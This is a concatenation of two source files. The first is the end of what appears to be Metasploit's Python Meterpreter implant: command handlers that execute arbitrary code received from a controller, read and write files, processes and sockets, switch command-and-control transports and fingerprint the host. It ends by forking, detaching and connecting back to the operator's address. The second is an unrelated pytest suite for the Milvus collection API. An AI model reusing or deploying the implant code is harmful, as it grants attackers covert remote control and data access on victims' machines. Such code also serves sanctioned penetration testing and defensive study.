response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
self.debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ipaddy, port))
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
sys.exit(retCode)
|
test_collection.py
|
import pdb
import pytest
import logging
import itertools
from time import sleep
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
drop_collection_interval_time = 3
index_file_size = 10
vectors = gen_vectors(100, dim)
class TestCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
def test_create_collection(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_ip(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_jaccard(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_hamming(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_substructure(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
def test_create_collection_superstructure(self, connect):
'''
target: test create normal collection
        method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
status = connect.create_collection(param)
assert status.OK()
# @pytest.mark.level(2)
# def test_create_collection_without_connection(self, dis_connect):
# '''
# target: test create collection, without connection
# method: create collection with correct params, with a disconnected instance
# expected: create raise exception
# '''
# collection_name = gen_unique_str("test_collection")
# param = {'collection_name': collection_name,
# 'dimension': dim,
# 'index_file_size': index_file_size,
# 'metric_type': MetricType.L2}
# with pytest.raises(Exception) as e:
# status = dis_connect.create_collection(param)
def test_create_collection_existed(self, connect):
'''
        target: test create collection when the collection name already exists
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
@pytest.mark.level(2)
def test_create_collection_existed_ip(self, connect):
'''
        target: test create collection when the collection name already exists
method: create collection with the same collection_name
expected: create status return not ok
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
status = connect.create_collection(param)
status = connect.create_collection(param)
assert not status.OK()
def test_create_collection_None(self, connect):
'''
target: test create collection but the collection name is None
method: create collection, param collection_name is None
expected: create raise error
'''
param = {'collection_name': None,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_dimension(self, connect):
'''
target: test create collection with no dimension params
        method: create collection without the dimension param
        expected: create raises an exception
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
with pytest.raises(Exception) as e:
status = connect.create_collection(param)
def test_create_collection_no_file_size(self, connect):
'''
target: test create collection with no index_file_size params
        method: create collection without the index_file_size param
expected: create status return ok, use default 1024
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
logging.getLogger().info(status)
status, result = connect.get_collection_info(collection_name)
logging.getLogger().info(result)
assert result.index_file_size == 1024
def test_create_collection_no_metric_type(self, connect):
'''
target: test create collection with no metric_type params
        method: create collection without the metric_type param
expected: create status return ok, use default L2
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size}
status = connect.create_collection(param)
status, result = connect.get_collection_info(collection_name)
logging.getLogger().info(result)
assert result.metric_type == MetricType.L2
"""
******************************************************************
The following cases are used to test `get_collection_info` function
******************************************************************
"""
def test_collection_describe_result(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.L2
@pytest.mark.level(2)
def test_collection_get_collection_info_name_ip(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.IP
@pytest.mark.level(2)
def test_collection_get_collection_info_name_jaccard(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.JACCARD
@pytest.mark.level(2)
def test_collection_get_collection_info_name_hamming(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.HAMMING
def test_collection_get_collection_info_name_substructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUBSTRUCTURE
def test_collection_get_collection_info_name_superstructure(self, connect):
'''
target: test describe collection created with correct params
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.collection_name == collection_name
assert res.metric_type == MetricType.SUPERSTRUCTURE
# TODO: enable
@pytest.mark.level(2)
def _test_collection_get_collection_info_name_multiprocessing(self, connect, args):
'''
target: test describe collection created with multiprocess
method: create collection, assert the value returned by describe method
expected: collection_name equals with the collection name created
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def describecollection(milvus):
status, res = milvus.get_collection_info(collection_name)
assert res.collection_name == collection_name
process_num = 4
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=describecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# @pytest.mark.level(2)
# def test_collection_describe_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.get_collection_info(collection)
def test_collection_describe_dimension(self, connect):
'''
target: test describe collection created with correct params
        method: create collection, assert the dimension value returned by describe method
        expected: dimension equals the dimension used at creation
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim+1,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, res = connect.get_collection_info(collection_name)
assert res.dimension == dim+1
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
def test_drop_collection(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(collection)
assert not assert_has_collection(connect, collection)
@pytest.mark.level(2)
def test_drop_collection_ip(self, connect, ip_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ip_collection)
assert not assert_has_collection(connect, ip_collection)
@pytest.mark.level(2)
def test_drop_collection_jaccard(self, connect, jac_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(jac_collection)
assert not assert_has_collection(connect, jac_collection)
@pytest.mark.level(2)
def test_drop_collection_hamming(self, connect, ham_collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
status = connect.drop_collection(ham_collection)
assert not assert_has_collection(connect, ham_collection)
# @pytest.mark.level(2)
# def test_collection_delete_without_connection(self, collection, dis_connect):
# '''
# target: test describe collection, without connection
# method: describe collection with correct params, with a disconnected instance
# expected: describe raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.drop_collection(collection)
def test_drop_collection_not_existed(self, connect):
'''
        target: test delete collection that was never created
        method: drop a randomly named, non-existent collection,
                assert the value returned by delete method
expected: status not ok
'''
collection_name = gen_unique_str("test_collection")
status = connect.drop_collection(collection_name)
assert not status.OK()
def test_delete_create_collection_repeatedly(self, connect):
'''
target: test delete and create the same collection repeatedly
method: try to create the same collection and delete repeatedly,
assert the value returned by delete method
expected: create ok and delete ok
'''
loops = 2
timeout = 5
for i in range(loops):
collection_name = "test_collection"
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status = None
while i < timeout:
status = connect.drop_collection(collection_name)
                sleep(1)
i += 1
if status.OK():
break
if i > timeout:
assert False
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing(self, args):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 6
processes = []
def deletecollection(milvus):
status = milvus.drop_collection(collection)
# assert not status.code==0
assert assert_has_collection(milvus, collection)
assert status.OK()
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=deletecollection, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
# TODO: enable
@pytest.mark.level(2)
def _test_drop_collection_multiprocessing_multicollection(self, connect):
'''
target: test delete collection with multiprocess
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
process_num = 5
loop_num = 2
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_drop_collection_with_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
j = j + 1
def delete(connect,ids):
i = 0
while i < loop_num:
status = connect.drop_collection(collection[ids*process_num+i])
                sleep(2)
assert status.OK()
assert not assert_has_collection(connect, collection[ids*process_num+i])
i = i + 1
for i in range(process_num):
ids = i
p = Process(target=delete, args=(connect,ids))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
def test_has_collection(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_ip(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_jaccard(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
def test_has_collection_hamming(self, connect):
'''
target: test if the created collection existed
method: create collection, assert the value returned by has_collection method
expected: True
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
assert assert_has_collection(connect, collection_name)
# @pytest.mark.level(2)
# def test_has_collection_without_connection(self, collection, dis_connect):
# '''
# target: test has collection, without connection
# method: calling has collection with correct params, with a disconnected instance
# expected: has collection raise exception
# '''
# with pytest.raises(Exception) as e:
# assert_has_collection(dis_connect, collection)
def test_has_collection_not_existed(self, connect):
'''
target: test if collection not created
        method: generate a random collection name that does not exist in the db,
assert the value returned by has_collection method
expected: False
'''
collection_name = gen_unique_str("test_collection")
assert not assert_has_collection(connect, collection_name)
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
def test_list_collections(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_ip(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_jaccard(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_hamming(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_substructure(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUBSTRUCTURE}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
def test_list_collections_superstructure(self, connect):
'''
        target: test that list_collections reports a created collection
        method: create collection, assert collection_name appears in the result of list_collections
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.SUPERSTRUCTURE}
connect.create_collection(param)
status, result = connect.list_collections()
assert status.OK()
assert collection_name in result
# @pytest.mark.level(2)
# def test_list_collections_without_connection(self, dis_connect):
# '''
# target: test list_collections, without connection
# method: calling list_collections with correct params, with a disconnected instance
# expected: list_collections raise exception
# '''
# with pytest.raises(Exception) as e:
# status = dis_connect.list_collections()
@pytest.mark.level(2)
def test_list_collections_no_collection(self, connect):
'''
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
'''
status, result = connect.list_collections()
if result:
for collection_name in result:
connect.drop_collection(collection_name)
time.sleep(drop_collection_interval_time)
status, result = connect.list_collections()
assert status.OK()
assert len(result) == 0
# TODO: enable
@pytest.mark.level(2)
def _test_list_collections_multiprocessing(self, connect, args):
'''
        target: test that list_collections is correct across multiple processes
        method: create collection, assert collection_name appears in the result of list_collections in each process
expected: collection_name in show collections
'''
collection_name = gen_unique_str("test_collection")
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
def showcollections(milvus):
status, result = milvus.list_collections()
assert status.OK()
assert collection_name in result
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
p = Process(target=showcollections, args=(milvus,))
processes.append(p)
p.start()
for p in processes:
p.join()
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
@pytest.mark.level(1)
def test_load_collection(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.load_collection(collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.load_collection(ip_collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_jaccard(self, connect, jac_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(jac_collection, vectors)
status = connect.create_index(jac_collection, index_type, index_param)
status = connect.load_collection(jac_collection)
assert status.OK()
@pytest.mark.level(1)
def test_load_collection_hamming(self, connect, ham_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.insert(ham_collection, vectors)
status = connect.create_index(ham_collection, index_type, index_param)
status = connect.load_collection(ham_collection)
assert status.OK()
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.insert(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
status = connect.load_collection(collection_name)
assert not status.OK()
@pytest.mark.level(2)
def test_load_collection_not_existed_ip(self, connect, ip_collection, get_simple_index):
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
collection_name = gen_unique_str()
status, ids = connect.insert(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.load_collection(collection_name)
assert not status.OK()
@pytest.mark.level(1)
def test_load_collection_no_vectors(self, connect, collection):
status = connect.load_collection(collection)
assert status.OK()
@pytest.mark.level(2)
def test_load_collection_no_vectors_ip(self, connect, ip_collection):
status = connect.load_collection(ip_collection)
assert status.OK()
# TODO: psutils get memory usage
@pytest.mark.level(1)
def test_load_collection_memory_usage(self, connect, collection):
pass
